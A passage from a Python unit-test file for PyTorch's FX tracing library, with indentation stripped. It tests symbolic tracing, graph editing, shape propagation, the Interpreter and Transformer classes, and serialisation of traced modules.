self.assertEqual(traced_out.left, ref_out.left)
self.assertEqual(traced_out.right, ref_out.right)
def test_custom_proxy_type_literal(self):
class TensorPair(metaclass=torch.fx.ProxyableClassMeta):
def __init__(self, left, right):
self.left, self.right = left, right
def add(self, other):
l = self.left + other.left
r = self.right + other.right
return TensorPair(l, r)
def mul(self, other):
l = self.left * other.left
r = self.right * other.right
return TensorPair(l, r)
def use_tensor_pair_literal(x : TensorPair):
s = x.add(TensorPair(torch.zeros(5, 3), torch.zeros(5, 3)))
return s.mul(x)
x = TensorPair(torch.randn(5, 3), torch.randn(5, 3))
ref_out = use_tensor_pair_literal(x)
traced = symbolic_trace(use_tensor_pair_literal)
traced_out = traced(x)
self.assertEqual(traced_out.left, ref_out.left)
self.assertEqual(traced_out.right, ref_out.right)
def test_custom_proxy_dynamic_value(self):
class TensorPair(metaclass=torch.fx.ProxyableClassMeta):
def __init__(self, left, right):
self.left, self.right = left, right
def add(self, other):
l = self.left + other.left
r = self.right + other.right
return TensorPair(l, r)
def mul(self, other):
l = self.left * other.left
r = self.right * other.right
return TensorPair(l, r)
def use_tensor_pair_ctor(x : TensorPair, y : torch.Tensor):
s = x.add(TensorPair(y, y))
return s.mul(x)
x = TensorPair(torch.randn(5, 3), torch.randn(5, 3))
y = torch.randn(5, 3)
ref_out = use_tensor_pair_ctor(x, y)
traced = symbolic_trace(use_tensor_pair_ctor)
traced_out = traced(x, y)
self.assertEqual(traced_out.left, ref_out.left)
self.assertEqual(traced_out.right, ref_out.right)
def test_custom_proxy_input_dependent_control_flow(self):
class ZeroTensor(metaclass=torch.fx.ProxyableClassMeta):
def __init__(self, inp):
if inp.sum() == 0:
self.is_zero = True
self.tensor = torch.tensor([])
else:
self.is_zero = False
self.tensor = inp
def add(self, other):
if self.is_zero:
return ZeroTensor(other.tensor)
elif other.is_zero:
return self
def use_zero_tensor(x : torch.Tensor, y : torch.Tensor):
return ZeroTensor(x + y)
x, y = torch.randn(5, 3), torch.randn(5, 3)
ref_out = use_zero_tensor(x, y)
traced = symbolic_trace(use_zero_tensor)
traced_out = traced(x, y)
self.assertEqual(traced_out.is_zero, ref_out.is_zero)
self.assertEqual(traced_out.tensor, ref_out.tensor)
def test_graph_fns(self):
g = Graph()
a = g.placeholder('a')
b = g.call_module('linear', (a,))
c = g.get_attr('bias')
d = g.call_method('add', (b, c))
e = g.call_function(torch.sin, (d,))
g.output(e)
mod = torch.nn.Module()
mod.linear = torch.nn.Linear(3, 4)
mod.bias = torch.rand(4)
gm = GraphModule(mod, g)
gm.graph.lint()
input = torch.rand(3)
r = gm(input)
ref = torch.sin(mod.linear(input) + mod.bias)
self.assertEqual(r, ref)
def test_remove_uses(self):
g : torch.fx.Graph = Graph()
x : torch.fx.Node = g.placeholder('x')
relu : torch.fx.Node = g.call_function(torch.relu, (x,))
neg : torch.fx.Node = g.call_function(torch.neg, (relu,))
g.output(neg)
neg.replace_all_uses_with(relu)
g.erase_node(neg)
self.assertTrue(neg not in relu.users)
def test_nonetype_annotation(self):
eb = torch.nn.EmbeddingBag(3, 4)
symbolic_trace(eb)
def test_pickle_nonetype_annotation(self):
eb = torch.nn.EmbeddingBag(10, 3, mode='sum')
traced = symbolic_trace(eb)
pickled = pickle.dumps(traced)
loaded = pickle.loads(pickled)
loaded.graph.lint()
input = torch.LongTensor([1, 2, 4, 5, 4, 3, 2, 9])
offsets = torch.LongTensor([0, 4])
self.assertEqual(loaded(input, offsets), traced(input, offsets))
def test_return_tuple(self):
class M(torch.nn.Module):
def forward(self, x: torch.Tensor) -> Tuple[torch.Tensor, torch.Tensor]:
return (x, x + x)
original = M()
traced = symbolic_trace(original)
self.assertEqual(traced(torch.ones(1)), original.forward(torch.ones(1)))
def test_construct_root_dict(self):
graph : torch.fx.Graph = torch.fx.Graph()
a : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_module', 'foo.bar.baz', args=(a,))
c : torch.fx.Node = graph.create_node('get_attr', 'zip.zap.zam')
d : torch.fx.Node = graph.create_node('call_function', operator.add, args=(b, c))
graph.output(d)
linear_mod : torch.nn.Module = torch.nn.Linear(3, 4)
add_param : torch.Tensor = torch.rand(3, 4)
gm : torch.fx.GraphModule = torch.fx.GraphModule(
{'foo.bar.baz': linear_mod, 'zip.zap.zam' : add_param}, graph)
gm.graph.lint()
assert 'self.foo.bar.baz' in gm.code
x : torch.Tensor = torch.rand(3, 3)
out : torch.Tensor = gm(x)
ref_out : torch.Tensor = linear_mod(x) + add_param
self.assertEqual(out, ref_out)
def test_symbolic_trace_assert(self):
class AssertsTensorShape(torch.nn.Module):
def forward(self, x):
torch._assert(x.shape[1] > 4, "assert_foobar")
return x
m = AssertsTensorShape()
# verify traceability
traced = symbolic_trace(m)
# verify assertion on traced model works correctly at runtime
traced(torch.rand(4, 5))
with self.assertRaisesRegex(AssertionError, "assert_foobar"):
traced(torch.rand(4, 3))
# verify the symbolically traced module is scriptable
ms = torch.jit.script(m)
with self.assertRaisesRegex(torch.jit.Error, "assert_foobar"):
ms(torch.rand(4, 3))
def test_fx_create_arg(self):
class CustomArgObject:
def __init__(self, x, y):
self.x = x
self.y = y
def __fx_create_arg__(self, tracer: torch.fx.Tracer):
return tracer.create_node(
"call_function",
CustomArgObject,
args=(
tracer.create_arg(self.x),
tracer.create_arg(self.y),
),
kwargs={},
)
class HasCustomArgObjectWhenLeaf(torch.nn.Module):
def forward(self, o: CustomArgObject):
# Not normally traceable; good reason to make
# this module a leaf.
for x in o.x:
o.y += x
return o.y
class Root(torch.nn.Module):
def __init__(self):
super().__init__()
self.inner = HasCustomArgObjectWhenLeaf()
def forward(self, x, y):
o = CustomArgObject(x, y)
return self.inner(o)
class CreateArgTracer(torch.fx.Tracer):
def is_leaf_module(self, m, module_qualified_name):
return type(m) is HasCustomArgObjectWhenLeaf
m = Root()
graph = CreateArgTracer().trace(m)
gm = torch.fx.GraphModule(m, graph)
assert "CustomArgObject(" in gm.code
def test_trace_fn_constant(self):
some_constant = torch.rand(3, 4)
def add_const(x):
return some_constant + x
traced = symbolic_trace(add_const)
input = torch.rand(3, 4)
self.assertEqual(traced(input), add_const(input))
def test_copy_no_remap(self):
traced = symbolic_trace(SimpleTest())
g = traced.graph
copied = torch.fx.Graph()
for node in g.nodes:
copied.node_copy(node)
with self.assertRaisesRegex(RuntimeError, 'does not belong to this Graph'):
copied.lint()
def test_wrong_topo(self):
graph : torch.fx.Graph = torch.fx.Graph()
a : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_module', 'foo.bar.baz', args=(a,))
c : torch.fx.Node = graph.create_node('get_attr', 'zip.zap.zam')
d : torch.fx.Node = graph.create_node('call_function', operator.add, args=(b, c))
graph.output(d)
nodes = list(graph.nodes)
nodes[3].append(nodes[2])
with self.assertRaisesRegex(RuntimeError, 'was used before it has been defined'):
graph.lint()
def test_wrong_target_type(self):
graph : torch.fx.Graph = torch.fx.Graph()
with self.assertRaises(ValueError):
n = torch.fx.Node(graph=graph, name='foo', op='call_function', target='foo',
args=(), kwargs={})
def test_example_shape_prop(self):
class TestCase(torch.nn.Module):
def __init__(self):
super().__init__()
self.attr = torch.randn(3, 4)
self.submod = torch.nn.Linear(4, 4)
def forward(self, x):
return torch.neg(self.submod(x.relu() + self.attr))
tc = TestCase()
tc_traced = symbolic_trace(tc)
ref_out = tc_traced(torch.rand(3, 4))
shape_prop.ShapeProp(tc_traced).propagate(torch.rand(3, 4))
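# ShapeProp stores a TensorMetadata record (shape, dtype, stride, memory_format, ...)
# in each node's meta['tensor_meta']; the loop below reads it off the output node.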
# Make sure we're testing all opcodes
opcodes = set()
output_shape : Optional[torch.Size] = None
output_stride : Optional[Tuple[int, ...]] = None
for node in tc_traced.graph.nodes:
opcodes.add(node.op)
if node.op == 'output':
output_shape = node.args[0].meta['tensor_meta'].shape
output_stride = node.args[0].meta['tensor_meta'].stride
self.assertEqual(opcodes, set(['placeholder', 'get_attr', 'call_function', 'call_method',
'call_module', 'output']))
# Test shape propagation and make sure results match actual
self.assertEqual(output_shape, ref_out.shape)
self.assertEqual(output_stride, ref_out.stride())
def test_shape_prop_layout(self):
class ConvTest(torch.nn.Module):
def __init__(self):
super().__init__()
self.conv_mod = torch.nn.Conv2d(5, 5, 3)
def forward(self, x):
return self.conv_mod(x)
# contiguous layout
test_mod = ConvTest()
traced = symbolic_trace(test_mod)
x = torch.randn(5, 5, 224, 224)
shape_prop.ShapeProp(traced).propagate(x)
assert(all(node.meta['tensor_meta'].memory_format is torch.contiguous_format
for node in traced.graph.nodes))
x_channels_last = x.contiguous(memory_format=torch.channels_last)
traced.to(memory_format=torch.channels_last)
shape_prop.ShapeProp(traced).propagate(x_channels_last)
for node in traced.graph.nodes:
# NB: the implementation of conv may not preserve the memory format,
# unfortunately. The best we can do is just check that the placeholder
# node is channels-last
if node.op in {'placeholder'}:
self.assertEqual(node.meta['tensor_meta'].memory_format, torch.channels_last)
def test_shape_prop_aggregate(self):
class ReturnTwo(torch.nn.Module):
def forward(self, x):
return (3, torch.sum(x))
class UnderTest(torch.nn.Module):
def __init__(self):
super().__init__()
self.rt = ReturnTwo()
def forward(self, x):
return self.rt(x)
ut = UnderTest()
class RTTracer(torch.fx.Tracer):
def is_leaf_module(self, m, module_qualified_name):
return type(m) is ReturnTwo
graph = RTTracer().trace(ut)
mod = torch.fx.GraphModule(ut, graph)
shape_prop.ShapeProp(mod).propagate(torch.rand(3, 4))
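# For a leaf module returning a tuple, meta['tensor_meta'] holds an aggregate:
# non-tensor elements (the literal 3) pass through as-is, while tensor elements
# get TensorMetadata entries, as the assertions below check.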
for node in mod.graph.nodes:
if node.op == 'call_module':
assert 'tensor_meta' in node.meta
tensor_meta = node.meta['tensor_meta']
assert tensor_meta[0] == 3
assert tensor_meta[1].shape == torch.Size([])
def test_shape_prop_layout_3d(self):
class ConvTest3d(torch.nn.Module):
def __init__(self):
super().__init__()
self.conv_mod = torch.nn.Conv3d(5, 5, 3)
def forward(self, x):
return self.conv_mod(x)
test_mod_3d = ConvTest3d()
traced_3d = symbolic_trace(test_mod_3d)
x_3d = torch.randn(5, 5, 224, 224, 15)
shape_prop.ShapeProp(traced_3d).propagate(x_3d)
assert(all(node.meta['tensor_meta'].memory_format is torch.contiguous_format
for node in traced_3d.graph.nodes))
x_channels_last_3d = x_3d.contiguous(memory_format=torch.channels_last_3d)
traced_3d.to(memory_format=torch.channels_last_3d)
shape_prop.ShapeProp(traced_3d).propagate(x_channels_last_3d)
for node in traced_3d.graph.nodes:
# NB: the implementation of conv may not preserve the memory format,
# unfortunately. The best we can do is just check that the placeholder
# node is channels-last
if node.op in {'placeholder'}:
self.assertEqual(node.meta['tensor_meta'].memory_format, torch.channels_last_3d)
def test_interpreter(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
return self.linear(x + self.param).clamp(min=0.0, max=1.0)
m = MyModule()
gm = torch.fx.symbolic_trace(m)
interpreter = Interpreter(gm)
input = torch.randn(3, 4)
self.assertEqual(interpreter.run(input), gm(input))
self.assertEqual(interpreter.run(input), m(input))
def test_interpreter_run_node_override(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
return self.linear(x + self.param).clamp(min=0.0, max=1.0)
m = MyModule()
gm = torch.fx.symbolic_trace(m)
class RunNodeInterpreter(Interpreter):
def __init__(self, module):
super().__init__(module)
def run_node(self, n : Node) -> Any:
result = super().run_node(n)
n.cached_value = result
return result
input = torch.randn(3, 4)
RunNodeInterpreter(gm).run(input)
for node in gm.graph.nodes:
assert hasattr(node, 'cached_value')
def test_interpreter_onthefly_swap(self):
def fn(x):
return torch.sigmoid(x).neg()
gm = torch.fx.symbolic_trace(fn)
class NegSigmSwapInterpreter(Interpreter):
def call_function(self, target : Target, args : Tuple, kwargs : Dict) -> Any:
if target == torch.sigmoid:
return torch.neg(*args, **kwargs)
return super().call_function(target, args, kwargs)
def call_method(self, target : Target, args : Tuple, kwargs : Dict) -> Any:
if target == 'neg':
call_self, *args_tail = args
return call_self.sigmoid(*args_tail, **kwargs)
return super().call_method(target, args, kwargs)
input = torch.randn(3, 4)
result = NegSigmSwapInterpreter(gm).run(input)
self.assertEqual(result, torch.neg(input).sigmoid())
def test_interpreter_partial_eval(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
return self.linear(x + self.param).clamp(min=0.0, max=1.0)
gm = torch.fx.symbolic_trace(MyModule())
interp = Interpreter(gm)
env = {}
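# Pre-seed the 'linear' node's result so Interpreter.run() treats it as already
# computed and only evaluates the nodes downstream of it (partial evaluation).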
for node in gm.graph.nodes:
if node.op == 'call_module' and node.target == 'linear':
env[node] = torch.arange(0, 12, 1).reshape(3, 4) - 6.0
break
assert len(env) == 1
x = torch.randn(3, 4)
result = interp.run(x, initial_env=env)
self.assertEqual(result, (torch.arange(0, 12, 1).reshape(3, 4) - 6.0).clamp(0.0, 1.0))
def test_interpreter_star_args(self):
def with_star_args(x, *args):
return x + args[0]
gm = torch.fx.symbolic_trace(with_star_args)
interp = Interpreter(gm)
result = interp.run(torch.ones(3, 4), torch.ones(3, 4), torch.rand(3, 4))
self.assertEqual(result, torch.ones(3, 4) * 2.0)
@skipIfNoTorchVision
def test_interpreter_noop_resnet18(self):
rn18 = torchvision_models.resnet18()
transformed = torch.fx.Transformer(symbolic_trace(rn18)).transform()
inp = torch.randn(5, 3, 224, 224)
self.assertEqual(transformed(inp), rn18(inp))
@skipIfNoTorchVision
def test_interpreter_gc_values(self):
rn18 = torchvision_models.resnet18()
interp = Interpreter(symbolic_trace(rn18))
inp = torch.rand(5, 3, 224, 224)
out = interp.run(inp)
env_key_names = set(n.name for n in interp.env.keys())
self.assertEqual(env_key_names, set(['output']))
def test_transformer_noop(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
return self.linear(x + self.param).clamp(min=0.0, max=1.0)
m = MyModule()
gm = torch.fx.symbolic_trace(m)
new_gm = Transformer(gm).transform()
input = torch.randn(3, 4)
self.assertEqual(new_gm(input), gm(input))
def test_transformer_op_swap(self):
def fn(x):
return torch.sigmoid(x).neg()
gm = torch.fx.symbolic_trace(fn)
class NegSigmSwapXformer(Transformer):
def call_function(self, target : Target, args : Tuple, kwargs : Dict) -> Any:
if target == torch.sigmoid:
return torch.neg(*args, **kwargs)
return super().call_function(target, args, kwargs)
def call_method(self, target : Target, args : Tuple, kwargs : Dict) -> Any:
if target == 'neg':
call_self, *args_tail = args
return call_self.sigmoid(*args_tail, **kwargs)
return super().call_method(target, args, kwargs)
transformed = NegSigmSwapXformer(gm).transform()
input = torch.randn(3, 4)
self.assertEqual(transformed(input), torch.neg(input).sigmoid())
def test_transformer_multi_outputs(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
x = x + self.param
out = self.linear(x)
return x, out
m = MyModule()
gm = torch.fx.symbolic_trace(m)
new_gm = Transformer(gm).transform()
input = torch.randn(3, 4)
self.assertEqual(new_gm(input), gm(input))
def test_fn_type_annotations(self):
class Foo(torch.nn.Module):
def forward(self, p : Pair, z : torch.Tensor, i : int) -> Dict[str, torch.Tensor]:
return {'a': p.x + p.y + z + i}
foo_scripted = torch.jit.script(Foo())
foo_scripted(Pair(torch.rand(5), torch.rand(5)), torch.rand(5), 3)
fxed = symbolic_trace(Foo())
fxed_scripted = torch.jit.script(fxed)
fxed_scripted(Pair(torch.rand(5), torch.rand(5)), torch.rand(5), 3)
def test_fn_type_annotation_empty(self):
def forward(a : List[torch.Tensor]):
return a[0]
torch.jit.script(symbolic_trace(forward))
def test_wrapped_method(self):
def wrap_with_relu(fn):
@functools.wraps(fn)
def wrapper(*args, **kwargs):
return torch.relu(fn(*args, **kwargs))
return wrapper
class Foo(torch.nn.Module):
@wrap_with_relu
def forward(self, x, w):
return torch.matmul(x, w)
f = Foo()
traced = symbolic_trace(f)
x, w = torch.rand(3, 4), torch.rand(4, 4)
self.assertTrue(any(n.target == torch.relu for n in traced.graph.nodes))
def test_empty_graph_codegen(self):
graph = torch.fx.Graph()
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
self.assertEqual(gm(), None)
def test_sequential(self):
m = torch.nn.Sequential(torch.nn.Conv2d(1, 1, 1))
gm = torch.fx.symbolic_trace(m)
gm_copy = copy.deepcopy(gm)
def test_ctx_mgr(self):
@contextlib.contextmanager
def do_nothing():
yield
class M(torch.nn.Module):
def __init__(self):
super().__init__()
@do_nothing()
def forward(self, x):
return torch.relu(x)
m = M()
self.checkGraphModule(m, (torch.rand(3, 4),))
def test_typename_print(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,),
type_expr=List[float])
output : torch.fx.Node = graph.output(b)
self.assertTrue('typing.List[float]' in str(graph))
def test_layout(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, x):
return torch.empty_like(x, layout=torch.strided, pin_memory=False).fill_(0)
traced = symbolic_trace(M())
x = torch.rand(5, 9, 3, 4)
self.assertEqual(traced(x), torch.zeros_like(x))
def test_ellipsis(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, x, y):
return x + y[:, 1:10, ...]
traced = symbolic_trace(M())
x, y = torch.rand(5, 9, 3, 4), torch.rand(5, 15, 3, 4)
self.assertEqual(traced(x, y), x + y[:, 1:10, ...])
def test_inf_nan(self):
class FooMod(torch.nn.Module):
def forward(self, x):
return x + float('inf'), x + float('-inf'), x + float('nan')
fm = FooMod()
self.checkGraphModule(fm, (torch.rand(3, 4),))
def test_inf_nan_kwds(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_function', operator.add, (x, float('inf')), {}, name='inf')
c : torch.fx.Node = graph.create_node('call_function', operator.add, (x, float('nan')), {}, name='nan')
graph.output((b, c))
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
x = torch.rand(3, 4)
self.assertEqual(gm(x), (x + float('inf'), x + float('nan')))
def test_deepcopy_recursion_depth(self):
depth = sys.getrecursionlimit() + 20
g = torch.fx.Graph()
x = g.placeholder('x')
for i in range(depth):
x = g.call_function(torch.relu, (x,))
g.output(x)
copied_graph = copy.deepcopy(g)
val_map = {}
for orig_node, new_node in zip(g.nodes, copied_graph.nodes):
val_map[orig_node] = new_node
for orig_node, new_node in zip(g.nodes, copied_graph.nodes):
orig_users = set(orig_node.users.keys())
orig_users_equiv = set(val_map[u] for u in orig_users)
new_users = set(new_node.users.keys())
self.assertEqual(orig_users_equiv, new_users)
@skipIfNoTorchVision
def test_replace_uses(self):
rn18 = torchvision_models.resnet18()
class LowerReluTracer(torch.fx.Tracer):
def is_leaf_module(self, m : torch.nn.Module, qualname : str):
if isinstance(m, torch.nn.ReLU):
return False
return super().is_leaf_module(m, qualname)
rn18_traced = GraphModule(rn18, LowerReluTracer().trace(rn18))
to_erase = []
for node in rn18_traced.graph.nodes:
if node.op == 'call_function' and node.target in [torch.relu, torch.nn.functional.relu]:
kwargs = node.kwargs.copy()
# Neg doesn't have in-place
kwargs.pop('inplace')
with rn18_traced.graph.inserting_before(node):
new_node = rn18_traced.graph.call_function(
the_function=torch.neg, args=node.args, kwargs=kwargs)
node.replace_all_uses_with(replace_with=new_node)
to_erase.append(node)
for node in to_erase:
rn18_traced.graph.erase_node(node)
def test_replace_input(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
y : torch.fx.Node = graph.create_node('placeholder', 'y')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,))
output : torch.fx.Node = graph.output(b)
b.replace_input_with(x, y)
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
input_x = torch.randn(33, 44)
input_y = torch.randn(11, 22)
self.assertEqual(gm(input_x, input_y), torch.relu(input_y))
def test_insertion_point(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,))
output : torch.fx.Node = graph.output(b)
with graph.inserting_before(b):
neg : torch.fx.Node = graph.call_function(the_function=torch.neg, args=(x,))
_, *relu_args = b.args
b.args = (neg, *relu_args)
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
input = torch.randn(33, 44)
self.assertEqual(gm(input), torch.relu(torch.neg(input)))
def test_update_args_api(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
y : torch.fx.Node = graph.create_node('placeholder', 'y')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,))
output : torch.fx.Node = graph.output(b)
orig_gm = torch.fx.GraphModule(torch.nn.Module(), graph)
inp_x, inp_y = torch.randn(5, 3), torch.randn(3, 5)
self.assertEqual(orig_gm(inp_x, inp_y), torch.relu(inp_x))
b.update_arg(0, y)
new_gm = torch.fx.GraphModule(torch.nn.Module(), graph)
self.assertEqual(new_gm(inp_x, inp_y), torch.relu(inp_y))
def test_update_kwargs_api(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
y : torch.fx.Node = graph.create_node('placeholder', 'y')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, kwargs={'input': x})
output : torch.fx.Node = graph.output(b)
orig_gm = torch.fx.GraphModule(torch.nn.Module(), graph)
inp_x, inp_y = torch.randn(5, 3), torch.randn(3, 5)
self.assertEqual(orig_gm(inp_x, inp_y), torch.relu(inp_x))
b.update_kwarg('input', y)
new_gm = torch.fx.GraphModule(torch.nn.Module(), graph)
self.assertEqual(new_gm(inp_x, inp_y), torch.relu(inp_y))
def test_move_before(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,))
output : torch.fx.Node = graph.output(b)
neg : torch.fx.Node = graph.call_function(the_function=torch.neg, args=(x,))
_, *relu_args = b.args
b.args = (neg, *relu_args)
b.prepend(neg)
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
input = torch.randn(33, 44)
self.assertEqual(gm(input), torch.relu(torch.neg(input)))
def test_erase_node_error(self):
st = SimpleTest()
traced = symbolic_trace(st)
for node in traced.graph.nodes:
# Test deleting with uses both in another Node and at the output
if node.target in [operator.add, torch.relu]:
with self.assertRaisesRegex(RuntimeError, 'but it still had .* users in the graph'):
traced.graph.erase_node(node)
def test_copy_it(self):
d = immutable_dict([(3, 4), (5, 6)])
l = immutable_list([(3, 4), (5, 6)])
self.assertEqual(d, deepcopy(d))
self.assertEqual(l, deepcopy(l))
def test_get_torch_func_signature(self):
for key in dir(torch):
obj = getattr(torch, key)
if callable(obj):
schemas = get_signature_for_torch_op(obj)
def test_find_uses(self):
graph = torch.fx.Graph()
x = torch.fx.Proxy(graph.placeholder('x'))
y = torch.relu(x)
z = x + x
u = torch.neg(x)
graph.output((y + z + u).node)
graph.lint()
users_of_x = x.node.users
self.assertEqual(len(users_of_x), 3)
expected_ops = set(['relu', 'add', 'neg'])
for use in users_of_x:
assert any(use.name.startswith(prefix) for prefix in expected_ops)
def test_inline_graph(self):
class InlineInto(torch.nn.Module):
def forward(self, x):
return torch.relu(x)
class ToInline(torch.nn.Module):
def forward(self, x):
return torch.neg(x)
inline_into = symbolic_trace(InlineInto())
to_inline = symbolic_trace(ToInline())
combined_graph = torch.fx.Graph()
output_node = combined_graph.graph_copy(inline_into.graph, {})
input_node = list(to_inline.graph.nodes)[0]
assert input_node and input_node.op == 'placeholder'
val_map = {input_node : output_node}
output = combined_graph.graph_copy(to_inline.graph, val_map)
combined_graph.output(output)
combined_module = torch.fx.GraphModule(torch.nn.Module(), combined_graph)
input = torch.rand(3, 4)
self.assertEqual(combined_module(input), input.relu().neg())
def test_multi_insert_point(self):
graph = torch.fx.Graph()
x = torch.fx.Proxy(graph.placeholder('x'))
relu = torch.relu(x)
with graph.inserting_before(relu.node):
y = torch.neg(x)
z = torch.tanh(y)
graph.output((relu.node, z.node))
graph.lint()
expected_ops = ['x', 'neg', 'tanh', 'relu']
for node, expected in zip(graph.nodes, expected_ops):
assert expected in node.name
def test_reassign_args_kwargs_uses(self):
graph = torch.fx.Graph()
x, y = Proxy(graph.placeholder('x')), Proxy(graph.placeholder('y'))
z = x + y
zed = z + z + z
graph.output(zed.node)
graph.lint()
# zed = z + z + z -> zed = z + z + x
zed.node.args = (zed.node.args[0], x.node)
self.assertEqual(list(x.node.users.keys()), [z.node, zed.node])
# z = x + y -> z = y + y
z.node.args = (y.node, y.node)
self.assertEqual(list(x.node.users.keys()), [zed.node])
def test_trace_function(self):
def foo(x, y):
return torch.relu(x) + y
x, y = torch.randn(3, 4), torch.randn(3, 4)
self.checkGraphModule(foo, (x, y))
def test_trace_dict_int_keys(self):
class ModWithDictArg(torch.nn.Module):
def forward(self, d : Dict[int, torch.Tensor]):
return d[42]
class CallsModWithDict(torch.nn.Module):
def __init__(self):
super().__init__()
self.m = ModWithDictArg()
def forward(self, x):
return self.m({42: x})
class MyTracer(torch.fx.Tracer):
def is_leaf_module(self, m: torch.nn.Module, module_qualified_name : str) -> bool:
return isinstance(m, ModWithDictArg)
traced_graph = MyTracer().trace(CallsModWithDict())
def test_trace_dict_proxy_keys(self):
class ModWithDictArg(torch.nn.Module):
def forward(self, d : Dict[torch.Tensor, torch.Tensor]):
return d[42]
class CallsModWithDict(torch.nn.Module):
def __init__(self):
super().__init__()
self.m = ModWithDictArg()
def forward(self, x):
return self.m({x: x})
class MyTracer(torch.fx.Tracer):
def is_leaf_module(self, m: torch.nn.Module, module_qualified_name : str) -> bool:
return isinstance(m, ModWithDictArg)
with self.assertRaisesRegex(RuntimeError, 'cannot contain a Node'):
traced_graph = MyTracer().trace(CallsModWithDict())
def test_module_deepcopy_edit_nodes(self):
class Foo(torch.nn.Module):
def forward(self, x):
return torch.relu(x)
traced1 = symbolic_trace(Foo())
copied = copy.deepcopy(traced1)
for node in copied.graph.nodes:
if node.target == torch.relu:
node.target = torch.neg
copied.recompile()
traced1.recompile()
x = torch.randn(15, 15)
torch.testing.assert_allclose(traced1(x), torch.relu(x))
torch.testing.assert_allclose(copied(x), torch.neg(x))
def test_direct_param_use(self):
class TransposeTest(torch.nn.Module):
def __init__(self):
super().__init__()
self.b = torch.nn.Parameter(torch.rand(4, 3))
def forward(self, x):
return self.b
class Foo(torch.nn.Module):
def __init__(self):
super().__init__()
self.a = TransposeTest()
def forward(self, x):
return self.a.b, self.a.b.t(), self.a.b.view(12)
traced = torch.fx.symbolic_trace(Foo())
assert(all('constant' not in node.target for node in traced.graph.nodes))
def test_single_default_arg(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, y=1):
return y
m = M()
self.checkGraphModule(m, ())
self.checkGraphModule(m, (3,))
def test_multiple_default_args(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, y=1, z=2):
return y + z
m = M()
self.checkGraphModule(m, ())
self.checkGraphModule(m, (3,))
self.checkGraphModule(m, (3, 4))
def test_regular_and_default_args(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, x, y=1):
return x + y
m = M()
self.checkGraphModule(m, (2,))
self.checkGraphModule(m, (2, 3))
def test_string_literal_return(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self):
return "foo"
m = M()
self.checkGraphModule(m, ())
def test_namedtuple_return_qualname(self):
class NamedTupReturn(torch.nn.Module):
def forward(self, x):
return MyNamedTup(x, x)
traced = symbolic_trace(NamedTupReturn())
input = torch.rand(3, 4)
self.assertEqual(traced(input), MyNamedTup(input, input))
def test_update_args_kwargs_yells_at_you(self):
symtraced = symbolic_trace(SimpleTest())
node = next(iter(symtraced.graph.nodes))
with self.assertRaisesRegex(AttributeError, '__update_args_kwargs'):
node.__update_args_kwargs((), {})
def test_torchbind_class_attribute_in_fx(self):
if TEST_WITH_ROCM or IS_FBCODE or IS_WINDOWS or IS_MACOS:
self.skipTest("torch.classes._TorchScriptTesting._StackString is registered, skipping")
class FooBar1234(torch.nn.Module):
def __init__(self):
super(FooBar1234, self).__init__()
self.f = torch.classes._TorchScriptTesting._StackString(["3", "4"])
def forward(self):
return self.f.top()
m = FooBar1234()
self.checkGraphModule(m, ())
def test_torchbind_class_attribute_in_fx_tensor_arg(self):
if TEST_WITH_ROCM or IS_FBCODE or IS_WINDOWS or IS_MACOS:
self.skipTest("torch.classes._TorchScriptTesting._ReLUClass is registered, skipping")
class FooBar2341(torch.nn.Module):
def __init__(self):
super(FooBar2341, self).__init__()
self.f = torch.classes._TorchScriptTesting._ReLUClass()
def forward(self, x):
return self.f.run(x)
m = FooBar2341()
traced = symbolic_trace(m)
input = torch.randn(3, 4)
self.assertEqual(traced(input), m(input))
self.assertTrue(any(n.op == 'call_method' for n in traced.graph.nodes))
def test_script_method_trace(self):
class Scripted(torch.nn.Module):
def forward(self, x):
return torch.relu(x)
class Holder(torch.nn.Module):
def __init__(self):
super().__init__()
